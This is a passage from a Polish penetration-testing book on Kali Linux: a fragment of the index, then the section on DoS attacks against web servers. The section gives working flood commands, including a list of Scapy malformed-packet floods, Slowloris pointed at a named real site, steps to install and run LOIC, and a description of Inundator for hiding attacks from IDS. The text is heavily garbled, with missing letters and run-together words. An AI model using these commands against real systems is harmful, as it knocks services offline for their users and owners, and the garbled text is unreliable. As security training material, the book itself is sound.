i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 32: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj 